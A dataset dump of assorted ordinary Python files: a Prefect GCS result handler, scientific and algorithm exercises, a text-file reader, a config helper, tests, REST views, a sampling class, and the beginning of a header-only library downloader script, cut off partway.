+{"seq_id":"527175420","text":"import base64\nimport uuid\nfrom typing import TYPE_CHECKING, Any\n\nimport cloudpickle\nimport pendulum\n\nfrom prefect.client import Secret\nfrom prefect.engine.result_handlers import ResultHandler\n\nif TYPE_CHECKING:\n    import google.cloud\n\n\nclass GCSResultHandler(ResultHandler):\n    \"\"\"\n    Result Handler for writing to and reading from a Google Cloud Bucket.\n\n    To authenticate with Google Cloud, you need to ensure that your flow's runtime environment\n    has the proper credentials available (see\n    https://cloud.google.com/docs/authentication/production for all the authentication\n    options).\n\n    You can also optionally provide the name of a Prefect Secret containing your\n    service account key.\n\n    Args:\n        - bucket (str): the name of the bucket to write to / read from\n        - credentials_secret (str, optional): the name of the Prefect Secret\n            which stores a JSON representation of your Google Cloud credentials.\n    \"\"\"\n\n    def __init__(self, bucket: str = None, credentials_secret: str = None) -> None:\n        self.bucket = bucket\n        self.credentials_secret = credentials_secret\n        super().__init__()\n\n    def initialize_client(self) -> None:\n        \"\"\"\n        Initializes GCS connections.\n        \"\"\"\n        from prefect.utilities.gcp import get_storage_client\n\n        if self.credentials_secret:\n            credentials = Secret(self.credentials_secret).get()\n        else:\n            credentials = None\n        client = get_storage_client(credentials=credentials)\n        self.gcs_bucket = client.bucket(self.bucket)\n\n    @property\n    def gcs_bucket(self) -> \"google.cloud.storage.bucket.Bucket\":\n        if not hasattr(self, \"_gcs_bucket\"):\n            self.initialize_client()\n        return self._gcs_bucket\n\n    @gcs_bucket.setter\n    def gcs_bucket(self, val: Any) -> None:\n        self._gcs_bucket = val\n\n    def __getstate__(self) -> dict:\n        state = self.__dict__.copy()\n        if \"_gcs_bucket\" in state:\n            del state[\"_gcs_bucket\"]\n        return state\n\n    def __setstate__(self, state: dict) -> None:\n        self.__dict__.update(state)\n\n    def write(self, result: Any) -> str:\n        \"\"\"\n        Given a result, writes the result to a location in GCS\n        and returns the resulting URI.\n\n        Args:\n            - result (Any): the written result\n\n        Returns:\n            - str: the GCS URI\n        \"\"\"\n        date = pendulum.now(\"utc\").format(\"Y/M/D\")  # type: ignore\n        uri = \"{date}/{uuid}.prefect_result\".format(date=date, uuid=uuid.uuid4())\n        self.logger.debug(\"Starting to upload result to {}...\".format(uri))\n        binary_data = base64.b64encode(cloudpickle.dumps(result)).decode()\n        self.gcs_bucket.blob(uri).upload_from_string(binary_data)\n        self.logger.debug(\"Finished uploading result to {}.\".format(uri))\n        return uri\n\n    def read(self, uri: str) -> Any:\n        \"\"\"\n        Given a uri, reads a result from GCS, reads it and returns it\n\n        Args:\n            - uri (str): the GCS URI\n\n        Returns:\n            - Any: the read result\n        \"\"\"\n        try:\n            self.logger.debug(\"Starting to download result from {}...\".format(uri))\n            result = self.gcs_bucket.blob(uri).download_as_string()\n            try:\n                return_val = cloudpickle.loads(base64.b64decode(result))\n            except EOFError:\n                return_val = None\n            self.logger.debug(\"Finished downloading result from {}.\".format(uri))\n        except Exception as exc:\n            self.logger.exception(\n                \"Unexpected error while reading from result handler: {}\".format(\n                    repr(exc)\n                )\n            )\n            return_val = None\n        return return_val\n","sub_path":"src/prefect/engine/result_handlers/gcs_result_handler.py","file_name":"gcs_result_handler.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"345908351","text":"import pandas as pd\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\ndef clean_opcodes(filename):\n\n\tdf = pd.read_csv(filename)\n\tcleaned_df = df.dropna()\n\topcodes = cleaned_df.set_index('Opcode').T.to_dict('list')\n\n\t# import ipdb\n\t# ipdb.set_trace()\n\n\treturn opcodes","sub_path":"loops_s3/util/clean_opcodes.py","file_name":"clean_opcodes.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"193369995","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nmatplotlib.use('TkAgg')\n\nclass GP:\n    def __init__(self,kernelPar,varMeas):\n        self.kernelPar = kernelPar\n        self.varMeas = varMeas\n        self.emptyData = True\n\n    def kernel(self,z1,z2):\n        squaredDistance = np.linalg.norm(z1-z2,2)\n        return np.exp(-.5 * 1/self.kernelPar * squaredDistance)\n\n    def getKernelMatrix(self,vec1,vec2):\n        n = vec1.shape[0]\n        N = vec2.shape[0]\n        K = np.zeros((n,N))\n        for i in range(n):\n            for j in range(N):\n                 K[i,j] = self.kernel(vec1[i,:],vec2[j,:])\n        return K\n        # todo: only update K matrix instead of recalculating\n\n    def update(self,inputData,outputData):\n        if self.emptyData:\n            self.trainInput = inputData\n            self.trainOutput = outputData\n            self.emptyData = False\n        else:\n            self.trainInput = np.vstack((self.trainInput,inputData))\n            self.trainOutput = np.vstack((self.trainOutput,outputData))\n\n    def predict(self,input):\n        # mu = K(test,training).T*inv(K(training,training))*trainingOutput\n        K = self.getKernelMatrix(self.trainInput,self.trainInput)\n        L = np.linalg.cholesky(K + self.varMeas*np.eye(self.trainInput.shape[0]))\n\n        # Compute mean\n        Lk = np.linalg.solve(L,self.getKernelMatrix(self.trainInput,input))\n        mu = np.dot(Lk.T, np.linalg.solve(L,self.trainOutput))\n\n        # Compute variance\n        KStar = self.getKernelMatrix(input,input)\n        var = KStar - np.dot(Lk.T,Lk)\n\n        return mu, var\n\n# Parameter\nkernelPar = 1\nvarMeas = 0.001\nkappa = 100\nGP = GP(kernelPar,varMeas)\n\n# Ground Truth\n#f = lambda x,y: x**2 + 0.9*y**2\nf = lambda x,y: (np.sin(x) + np.sin(y))*np.exp(-0.1*np.abs(x+y))\nxGT0, xGT1 = np.meshgrid(np.linspace(-5,5,100),np.linspace(-5,5,100))\nfGT = f(xGT0,xGT1)\n#print(\"fGT:\",fGT)\n\nxTrain = np.random.uniform(-5,5,(1,2))\nxTrainHist = np.zeros((1000,2))\nfTrainHist = np.zeros((1000,1))\n\nfig = plt.figure()\nplt.ion()\nplt.show()\nfor i in range(100):\n    print(i)\n    # next measurement:\n    fTrain = f(xTrain[:,0],xTrain[:,1]) + varMeas*np.random.randn()\n    fTrain = fTrain.reshape(-1,1)\n    GP.update(xTrain,fTrain)\n\n    nSample = 100\n    xSample = np.random.uniform(-5,5,(nSample,2))\n    mu,var = GP.predict(xSample)\n    xTrainHist[i,:] = xTrain\n    fTrainHist[i] = fTrain\n\n    # acquisition function\n    H = mu.reshape(nSample,1) + kappa*np.sqrt(var.diagonal()).reshape(nSample,1)\n    index = np.argmax(H)\n    xTrain = xSample[index,:].reshape(1,2)\n\n    if i%10 == 0:\n        ax = fig.add_subplot(111,projection='3d')\n        ax.plot_wireframe(xGT0, xGT1, fGT)\n        ax.plot(xTrainHist[:,0],xTrainHist[:,1],fTrainHist[:,0],\"g.\")\n        ax.plot(xSample[:,0],xSample[:,1],mu[:,0],\"r.\")\n        plt.title(\"True field\")\n        print(\"difference:\",np.mean(mu-f(xSample[:,0],xSample[:,1])))\n        fig.canvas.draw()\n\nplt.show(block=True)\n\n\n","sub_path":"gaussianProcess.py","file_name":"gaussianProcess.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"597322301","text":"# Задача:\n# По данным n отрезкам необходимо найти множество точек минимального размера,\n# для которого каждый из отрезков содержит хотя бы одну из точек.\n#\n# В первой строке дано число 1≤n≤100 отрезков.\n# Каждая из последующих n строк содержит по два числа 0≤l≤r≤109, задающих начало и конец отрезка.\n# Выведите оптимальное число m точек и сами m точек.\n# Если таких множеств точек несколько, выведите любое из них.\n# Sample Input 1:\n#\n# 3\n# 1 3\n# 2 5\n# 3 6\n# Sample Output 1:\n#\n# 1\n# 3\n# Sample Input 2:\n#\n# 4\n# 4 7\n# 1 3\n# 2 5\n# 5 6\n# Sample Output 2:\n#\n# 2\n# 3 6\n\n\notr = []\n# Вводим количество отрезков\nn = int(input())\n# Заполняем otr отдельнами отрезками [[3,4],[5,6]]\nfor i in range(n):\n    otr.append([int(i) for i in input().split()])\n\n\n# Сортировка списка от наименьшего правого конца до наибольшего правого\notr = sorted(otr, key=lambda item: item[1])\n\n# Сразу добавляем правый конец первого отрезка для сравнения следующего\nall_dots = [otr[0][1]]\n\nfor i in range(n-1):\n    # Если начало следующего отрезка больше чем текущее значение, то добавляем новое значение\n    # Следующее значение соответственно будет сравниваться с новым по последнему элементу[-1]\n    if all_dots[-1] < otr[i+1][0]:\n        all_dots.append(otr[i+1][1])\n\n# Выводим длину отрезка и все элементы\nl = len(all_dots)\nprint(l)\n\nfor i in range(l):\n    print(all_dots[i], end=' ')","sub_path":"Greedy_algorithms/greed_1.py","file_name":"greed_1.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"512915622","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\nlogging.debug(str(sys.version_info))\nif sys.version_info[0] < 3 or sys.version_info[1] < 5:\n    raise Exception(\"Requires python 3.5+, try module load python/3.6-anaconda-4.4\")\n\n# could conceivably access files over ssh/scp this way too..\n\nimport re\nimport os\n_protocols = ['http', 'https', 'file']\n_pattern = '|'.join(( '(?P<{0}>{0}:)'.format(p) for p in _protocols ))\n_re_url = re.compile('(?:{})(?P.*)'.format(_pattern))\ndef factory(url):\n    m = _re_url.search(url)\n    if m is None:\n        cls = LocalTextFile\n        path = url\n    elif m.group('file'):\n        cls = LocalTextFile\n        path = m.group('path')\n    else:\n        cls = RemoteTextFile\n        path = url\n    return cls(path)\n\n# common interface for local and remote files:\n\nclass TextFile:\n    \"\"\" common interface for accessing local and remote files \"\"\"\n    _blksz = 4096 # somewhat-arbitrary chunksize as unit for reading\n\n    @property\n    def nblocks(self):\n        return (self.size+self._blksz-1) // self._blksz\n\n\nclass LocalTextFile(TextFile):\n\n    def __init__(self, path):\n        self.path = path\n        self._size = None\n        self._lastlines_cache = {} # block: partial-line\n\n    @property\n    def size(self):\n        if self._size is None:\n             self._size = os.path.getsize(self.path)\n        return self._size\n\n    #def readlines(self, firstblock=0, n=0):\n    def readlines(self, start=0, n=0):\n        \"\"\" generator yiedling n lines starting from the first definitely-\n            complete line after start. If start!=0, readlines assumes\n            it has landed partway into a line and discards until the next line \n            break. If there is less than a full line, yields no lines\n            If n<=0. read to the end of the file\n        \"\"\"\n        #logging.info(\"reading {0:d} lines from {1:d}\".format(n,start))\n        with open(self.path, 'r') as f:\n            #f.seek(firstblock*self._blksz)\n            f.seek(start) \n            line = f.readline()\n            #logging.info(\"read a line: {0}\".format(line))\n            count=0\n            if start == 0:\n                count += 1\n                #logging.info(\"yielding: {0}\".format(line))\n                yield line\n            while count < n or n <= 0:\n                line = f.readline()\n                if line == '':\n                    break\n                count += 1\n                #logging.info(\"yielding: {0}\".format(line))\n                yield line\n\n\nclass RemoteTextFile(TextFile):\n\n    def __init__(self, url):\n        self.url = url\n        self._size = None\n        # TODO: implement this:\n        self._lastlines_cache = {} # block: partial-line\n\n    @property\n    def size(self):\n        if self._size is None:\n            with urllib.request.urlopen(self.url) as f:\n                self._size = int(f.info()[\"Content-Length\"])\n        return self._size\n\n    def readlines(self, start=0, n=0):\n        if start==0 and n<=0:\n            # read whole file:\n            with urllib.request.urlopen(self.url) as f:\n                for line in f.readlines():\n                    yield line\n        else:\n            line = ''\n            while count < n or n < 0:\n                # need to keep fetching blocks till we have enough lines\n                #bs = min(self._blksz, self.size)\n                #b = 'bytes={0:d}-'.format(firstblock*self._blksz)\n                b = 'bytes={0:d}-'.format(start)\n                if n>0: # not reading till end of file\n                    b+='{0:d}'.format(min(start+self._blksz,self.size))\n                    #b+='{0:d}'.format((firstblock+1)*self._blksz - 1)\n                req = urllib.request.Request(self.url, headers={'Range':b})\n                with urllib.request.urlopen(req) as f:\n                    line += f.readline() # in case previous range left unfinished line\n                    while count < n or n < 0:\n                        if line[-1] != '\\n':\n                            # end of block, break and read next block\n                            #firstblock += 1 \n                            start += self._blksz\n                            break\n                        n += 1\n                        yield line\n                        line = f.readline()\n\n\n#import re\n#protocols = ['http', 'https', 'file']\n#pattern = '|'.join(( '(?P<{0}>{0}:)'.format(p) for p in protocols ))\n#re_url = re.compile('(?:{})(?P.*)'.format(pattern))\n#def TimeStampedLogFile(url, info):\n#    m = re_url.search(url)\n#    if m is None:\n#        cls = LocalTimeStampedLogFile\n#        path = url\n#    elif m.group('file'):\n#        cls = LocalTimeStampedLogFile\n#        path = m.group('path')\n#    else:\n#        cls = RemoteTimeStampedLogFile\n#        path = url\n#    return cls(path, info)\n#\n#logFormat = 'timeStampedLogFile'\n#constructor = TimeStampedLogFile\n#\n#import os\n#import dateutil.parser\n#class LocalTimeStampedLogFile(LogFormatType):\n#    # logfiles might be very large, and we often need to find particular lines.\n#    # rather than reading the whole file linearly and parsing for newlines, we'll\n#    # read chunks from an arbitrary location and pull complete lines from them.\n#    # _blocksz is an initial chunk size to use for this\n#    _blocksz = 1000\n#\n#    def __init__(self, path, info):\n#        self.path = path\n#        # regular attributes:\n#        # ts_words is the word or word ranges making up the timestamp, 0 is first-word-in-line:\n#        ts_words = info.get('ts_words',None)\n#        if ts_words:\n#            first, sep, last = ts_words.partition('-')\n#            ifirst = int(first)\n#            if last:\n#                ilast = int(last)+1\n#            else:\n#                ilast = ifirst + 1\n#            self.ts_words = (ifirst,ilast)\n#        else:\n#            self.ts_words = None\n#        # part_word is the word identifying the part about which each entry is:\n#        part_word = info.get('part_word',None)\n#        if part_word:\n#            self.part_word = int(part_word)\n#        else:\n#            self.part_word = None\n#        #for f in ('ts_words', 'part_word'):\n#        #    setattr(self, f, int(info.get(f, None))) # TODO handle int conversion better\n#        # attributes we might have to find from file:\n#        for f in ('size', 't_start', 't_end'):\n#            setattr(self, '_'+f, info.get(f, None))\n#\n#    @property\n#    def size(self):\n#        if self._size is None:\n#             self._size = os.path.getsize(self.path)\n#        return self._size\n#\n#    import io\n#    def timespan(self):\n#        \"\"\" return the timestamps of the first and last entries in the file \"\"\"\n#        if self._t_start is None or self._t_end is None:\n#            with open(self.path, 'r') as f:\n#                # find the first and last lines, check the timestamps\n#                firstline = f.readline()\n#            sz = self.size\n#            #with open(self.path, 'rb') as f:\n#            with open(self.path, 'r') as f: # must be text or string methods get confused\n#                bs = min(self._blocksz, sz)\n#                lines = []\n#                while bs <= sz:\n#                    #f.seek(-bs, 2)\n#                    f.seek(sz-bs)   # can only seek from start in text files\n#                    lines = f.readlines() # read to end of file\n#                    if len(lines) > 1:\n#                        break\n#                    bs *= 2\n#                else:\n#                    raise Exception(\"can't find last entry in {0:s}\".format(self.path))\n#                lastline = lines[-1]\n#            print (lastline)\n#            print(lastline.split())\n#            print(lastline.split()[self.ts_words[0]:self.ts_words[1]])\n#            print(self.ts_words)\n#            print(' '.join(lastline.split()[self.ts_words[0]:self.ts_words[1]]))\n#            self._t_start = dateutil.parser.parse(' '.join(firstline.split()[self.ts_words[0]:self.ts_words[1]]))\n#            self._t_end = dateutil.parser.parse(' '.join(lastline.split()[self.ts_words[0]:self.ts_words[1]]))\n#        return (self._t_start, self._t_end)\n#\n#    def entries(self, since=None, until=None, parts=None):\n#        \"\"\" return the log entries of data between 'since' (or the start of the \n#            file) and 'until' (or the end of the file), inclusive, optionally\n#            filtering for certain parts\n#        \"\"\"\n#        pass\n#\n#\n#import urllib.request\n#class RemoteTimeStampedLogFile(LogFormatType):\n#    _blocksz = 1000\n#\n#    def __init__(self, url, info):\n#        self.url = url\n#        # regular attributes:\n#        for f in ('ts_word', 'part_word'):\n#            setattr(self, f, info.get(f, None))\n#        # attributes we might have to find from file:\n#        for f in ('size', 't_start', 't_end'):\n#            setattr(self, '_'+f, info.get(f, None))\n#\n#    @property\n#    def size(self):\n#        if self._size is None:\n#            with urllib.request.urlopen(self.url) as f:\n#                self.size = f.info()[\"Content-Length\"]\n#        return self._size\n#\n#    def timespan(self):\n#        if self._t_start is None or self._t_end is None:\n#            with urllib.request.urlopen(self.url) as f:\n#                # find the first and last lines, check the timestamps\n#                firstline = f.readline()\n#            # read the last _blocksz bytes\n#            bs = min(self._blocksz, sz)\n#            lines = []\n#            # make sure we get at least a full line:\n#            while bs <= sz:\n#                b = 'bytes={0:d}-'.format(int(self.size)-bs)\n#                req = urllib.request.Request(self.url, headers={'Range':b})\n#                with urllib.request.urlopen(req) as f:\n#                    lines = f.readlines() # read to end of file\n#                    if len(lines) > 1:\n#                        break\n#                    bs += self._blocksz \n#            else:\n#                raise Exception(\"can't find last entry in {0:s}\".format(self.url))\n#            lastline = lines[-1]\n#            self._t_start = dateutil.parser.parse(firstline.split()[self.ts_word])\n#            self._t_end = dateutil.parser.parse(lastline.split()[self.ts_word])\n#        return (self._t_start, self._t_end)\n\n\n    \n","sub_path":"src/handlers/TextFile.py","file_name":"TextFile.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"532850381","text":"import os\nfrom typing import Optional\n\nimport yaml\nimport PySimpleGUI as sg\n\n\ndef mkdir(dir_path):\n    if not os.path.exists(dir_path):\n        os.mkdir(dir_path)\n\n\nclass YamlConfig:\n    def __init__(self, file_name=\"./settings/config.yaml\"):\n        self.file_name = file_name\n    \n    def load(self) -> dict:\n        \"\"\"\n        yamlファイルを読み辞書形式で結果を返す\n        :return: yamlファイルのデータ構造(辞書)\n        \"\"\"\n        with open(self.file_name, \"r\") as yf:\n            return yaml.load(yf, Loader=yaml.FullLoader)\n    \n    def write(self, data: dict) -> None:\n        \"\"\"\n        yamlを書き出す\n        :param data: yamlで出力するデータをまとめた辞書\n        \"\"\"\n        with open(self.file_name, \"w\") as yf:\n            yaml.dump(data, yf, default_flow_style=False)\n\n\ndef get_token(path):\n    yc = YamlConfig(path)\n    token: str = \"\"\n    if os.path.exists(path):\n        conf = yc.load()\n        token = conf[\"token\"]\n        \n    register_token: Optional[str] = sg.PopupGetText(\"Input the discord bot token\", \"Discord token\", token)\n    if register_token is None:\n        exit()\n    yc.write({\"token\": register_token})\n    return register_token\n","sub_path":"pkg/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"336476060","text":"import re\nfirst = True\nwhile True:\n    linhas = int(input())\n    texto = []\n    maior = 0\n    if linhas == 0:\n        break\n    else:\n        if not first:\n            print()\n        for l in range(linhas):\n            linha = re.sub(r'\\s+',' ', input().strip())\n            texto.append(linha)\n            if len(linha) > maior:\n                maior = len(linha)\n        for l in texto:\n            print('{0:>{1}}'.format(l,maior))\n        first = False","sub_path":"String/1278.py","file_name":"1278.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"545720141","text":"import random\npincode = [\"1221\", \"9997\", \"8829\", \"6765\", \"9114\", \"5673\", \"0103\", \"4370\", \"8301\", \"1022\"]\nnumber = (random.choice (pincode))\nprint(number)\n\nquesses = 0\nwhile quesses < 10:\n  userinput = input(\"Guess the random 4 digit number: \")\n\n  quesses += 1    \n  print (\"This is your guess: %s\" %(userinput))\n  print (\"You have used \" + str(quesses) + \" out of 10 guesses\")\n  if userinput == number:\n    quesses2 = str(quesses)\n    print (\"You guessed it in:\", quesses2 + \" guesses\")  \n\n  number = str(number)\n  userinput = str(userinput)\n  \n  if userinput.isdigit() == False:\n    print (\"Error: You can only use numbers\")\n    quesses = quesses - 1\n    continue\n  \n  if len(userinput) != len(number):\n    print(\"Your input is too long or too short.\")\n    quesses = quesses - 1\n    continue\n\n\n\n  check = [\"F\"] * 4\n  if userinput == number and quesses >= 1:\n    print(\"The game was beaten in \" + str(quesses) +\" quesses. Congratulations!\")\n    break\n  else:\n    for idx, digit in enumerate(userinput):     \n      #als het nummer op de goede plek staat, print G\n      if number[idx] == digit:       \n        check[idx] = \"G\"\n      \n      #als het nummer vookomt, print C\n      elif digit in number:\n        check[idx] = \"C\"\n      \n      #anders, print F\n      else:        \n        check[idx] = \"F\"\n      \n\n  e1 = \"1980\"\n  e2 = \"1955\"\n\n  if userinput != number and userinput == e1:\n\n     if userinput == e1:\n        print (\"Yeah! You found an easteregg: The birthyear of LGG!\")\n     quesses = quesses - 1\n    \n  elif userinput != number and userinput == e2:\n\n     if userinput == e2:\n        print (\"Yeah! You found an easteregg: The birthyear of BNT!\")\n     quesses = quesses - 1\n\n  else:\n     print(*check, sep=\" \")\n     print (\"Wrong code\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"44685908","text":"\"\"\"Test Clang utils.\"\"\"\nfrom collections import namedtuple\nfrom os import path\nfrom unittest import TestCase\n\nfrom EasyClangComplete.plugin.clang.utils import ClangUtils\n\ntest_file = namedtuple('test_file', 'name')\ntest_cursor = namedtuple('test_cursor', 'file line')\ntest_extent = namedtuple('test_extent', 'start end')\n\n\nclass TestClangUtils(TestCase):\n    \"\"\"Tests MacroParser.\"\"\"\n\n    def test_htmlize_text_ltgt(self):\n        \"\"\"Test a <> symbols convertion.\"\"\"\n        res = ClangUtils.htmlize_text('<>')\n        self.assertEqual(res, '<>')\n\n    def test_htmlize_text_newline(self):\n        \"\"\"Test a \\n convertion.\"\"\"\n        res = ClangUtils.htmlize_text('text\\ntext')\n        self.assertEqual(res, 'text
text')\n\n def test_htmlize_text_tab(self):\n \"\"\"Test a \\t convertion.\"\"\"\n res = ClangUtils.htmlize_text('text\\ttext')\n self.assertEqual(res, 'text' + 4 * ' ' + 'text')\n\n def test_htmlize_text_quot(self):\n \"\"\"Test a \" symbol convertion.\"\"\"\n res = ClangUtils.htmlize_text('text\"text')\n self.assertEqual(res, 'text' + ' ' + 'text')\n\n def test_htmlize_text_spaces(self):\n \"\"\"Test a single-line string with spaces.\"\"\"\n res = ClangUtils.htmlize_text(' 123')\n self.assertEqual(res, 3 * ' ' + '123')\n\n def test_get_text_by_extent_multifile(self):\n \"\"\"Test getting text from multifile extent.\"\"\"\n file1 = test_file('file1.c')\n file2 = test_file('file2.c')\n cursor1 = test_cursor(file1, 1)\n cursor2 = test_cursor(file2, 6)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), None)\n\n def test_get_text_by_extent_oneline(self):\n \"\"\"Test getting text from oneline extent.\"\"\"\n file_name = path.join(path.dirname(__file__),\n 'test_files',\n 'test.cpp')\n file1 = test_file(file_name)\n cursor1 = test_cursor(file1, 8)\n cursor2 = test_cursor(file1, 8)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), ' A a;\\n')\n\n def test_get_text_by_extent_multiline(self):\n \"\"\"Test getting text from multiline extent.\"\"\"\n file_name = path.join(path.dirname(__file__),\n 'test_files',\n 'test.cpp')\n file1 = test_file(file_name)\n cursor1 = test_cursor(file1, 8)\n cursor2 = test_cursor(file1, 9)\n ext = test_extent(cursor1, cursor2)\n self.assertEqual(ClangUtils.get_text_by_extent(ext), ' A a;\\n a.\\n')\n","sub_path":"tests/test_clang_utils.py","file_name":"test_clang_utils.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"396414280","text":"from rest_framework import (\n generics,\n permissions\n)\nfrom rest_framework_gis.pagination import GeoJsonPagination\n\nfrom api.serializers.tracks import (\n TrackSerializer,\n TrackGeoSerializer\n)\n\nfrom api.models import Track\n\nfrom api.filters import TrackFilter\n\n\nclass ListTrack(generics.ListAPIView):\n \"\"\"\n get:\n Returns a list of all tracks.\n \"\"\"\n serializer_class = TrackSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n filter_class = TrackFilter\n\n\nclass RetrieveTrack(generics.RetrieveAPIView):\n \"\"\"\n get:\n Returns the given track.\n \"\"\"\n serializer_class = TrackSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n\n\nclass ListGeoTrack(generics.ListAPIView):\n \"\"\"\n get:\n Returns a list of all tracks in geojson format.\n \"\"\"\n serializer_class = TrackGeoSerializer\n queryset = Track.objects.all()\n permission_classes = (permissions.AllowAny,)\n pagination_class = GeoJsonPagination\n filter_class = TrackFilter\n","sub_path":"app/api/views/tracks.py","file_name":"tracks.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"643287675","text":"# -*- coding: utf-8 -*-\nfrom textwrap import dedent\n\nimport numpy as np\nfrom scipy.stats import norm\n\nclass Sampler:\n def __init__(\n self,\n sample_size=None,\n population_size=None,\n margin_of_error=0.05,\n confidence_level=0.95,\n verbose=False\n ):\n self.sample_size=sample_size\n self.population_size=population_size\n self.margin_of_error=margin_of_error\n self.confidence_level=confidence_level\n self.verbose=verbose\n\n\nclass ProportionSampler(Sampler):\n def __init__(self, p_hat, **kwargs):\n super().__init__(**kwargs)\n self.p_hat=p_hat\n\n def __str__(self):\n msg = f\"\"\"\n *** Proportion Sampler Parameters ***\n =====================================\n observed p: {self.p_hat}\n sample size: {self.sample_size}\n population size: {self.population_size}\n margin of error: {self.margin_of_error}\n confidence level: {self.confidence_level}\n =====================================\n \"\"\"\n return dedent(msg)\n\n def _check_and_get(self, attr_name):\n attr = getattr(self, attr_name)\n if attr is None:\n raise ValueError(f'{attr_name} must be provided.')\n return attr\n\n def get_minimum_sample_size(self):\n p = self.p_hat\n m = self.margin_of_error\n c = self.confidence_level\n N = self.population_size\n p = self._check_and_get('p_hat')\n z = norm.ppf(1-(1-c)/2)\n sigma2 = (z**2) * p * (1 - p)\n n = sigma2 / (m**2)\n if N is None or n / N < 0.05:\n return np.round(n)\n else:\n if self.verbose:\n print('Applying finite population correction.')\n return np.round((N * sigma2) / ((m**2) * N + sigma2))\n\n def get_standard_error(self):\n p = self._check_and_get('p_hat')\n n = self._check_and_get('sample_size')\n fpc = 1\n N = self.population_size\n if N is not None and n / N > 0.05: \n fpc = np.sqrt((N-n)/(N-1))\n return np.sqrt(p*(1-p)/n) * fpc\n\n def get_margin_of_error(self):\n c = self._check_and_get('confidence_level')\n z = norm.ppf(1-(1-c)/2)\n return self.get_standard_error() * z\n\n def get_confidence_interval(self):\n p = self._check_and_get('p_hat')\n m = self.get_margin_of_error()\n return (p-m, p+m)\n","sub_path":"clinical/clinical.py","file_name":"clinical.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"375894727","text":"#!/bin/bash\n\nimport os\nfrom path import Path\nimport numpy as np\nimport glob\n\nPATH_DATA = Path('/scratch/bigdata/ABCD/abcd-fmriprep-rs/abcd-fmriprep-rs-untar')\nPATH_OUT = Path('/scratch/bigdata/ABCD/abcd-fmriprep-rs/abcd-fmriprep-rs-time')\n\n# \nSH_file = '/scratch/bigdata/ABCD/abcd-fmriprep-rs/time.sh'\n\ncmds = []\ndirs_input = sorted(PATH_DATA.glob('fmriprep-deri-*'))\n\nfor fprep in dirs_input:\n # extract sub name\n sub_num=os.path.basename(fprep) #-> split해서 마지막 이름만 받기\n sub_name=sub_num.split('-')[2]\n\n sub_run_folder=fprep+'/fmriprep/sub-'+sub_name+'/ses-baselineYear1Arm1/func'\n sub_run=[f for f in os.listdir(sub_run_folder) if 'res-2_desc-preproc_bold.nii.gz' in f]\n\n # return the base name from the path\n dir_out = str(PATH_OUT / os.path.basename(fprep))\n for s_run in sub_run:\n # cmds from : .sh file + input file(npz) + (output path+sub_name)\n cmds.append(' '.join([SH_file, str(sub_run_folder+'/'+s_run), dir_out, '\\n']))\n\nwith open('./jobs.txt', 'w') as f:\n f.writelines(cmds)\n\n","sub_path":"after_job_scheduler/time_create_jobs.py","file_name":"time_create_jobs.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"578908757","text":"\nimport os\nimport shutil\nimport system_helper\nimport zipfile\nimport requests\n\n\n'''\nDownloads a header only library as zip file and extracts the relevant include folder in the extern/ folder.\n\\param 1 - target folder name: /extern/, e.g. \"cgal\"\n\\param 2 - include folder in downloaded library, e.g. \"CGAL-5.0.2/include\"\n\\param 3 - zip file name, e.g. \"CGAL-5.0.2-library.zip\"\n\\param 4 - link to .zip file, e.g. \"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n'''\n\nextern_folder=\"extern\"\n\ndebug_output = False\n\nclass HeaderOnlyDescription:\n \n '''\n \\param target_folder, e.g. \"cgal\"\n \\param include_folder, e.g. \"CGAL-5.0.2/include\"\n \\param zip_file, e.g. \"CGAL-5.0.2-library.zip\"\n \\param download_link, e.g. \"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n '''\n def __init__(self, target_folder, include_folder, zip_file, download_link):\n self.target_folder = target_folder\n self.include_folder = include_folder\n self.zip_file = zip_file\n self.download_link = download_link\n\ndef download_header_only(target_folder, include_folder, zip_file, download_link, tmp_folder, extern_folder = \"extern\", verbose = True): \n '''\n \\param target_folder, e.g. \"cgal\"\n \\param include_folder, e.g. \"CGAL-5.0.2/include\"\n \\param zip_file, e.g. \"CGAL-5.0.2-library.zip\"\n \\param download_link, e.g. 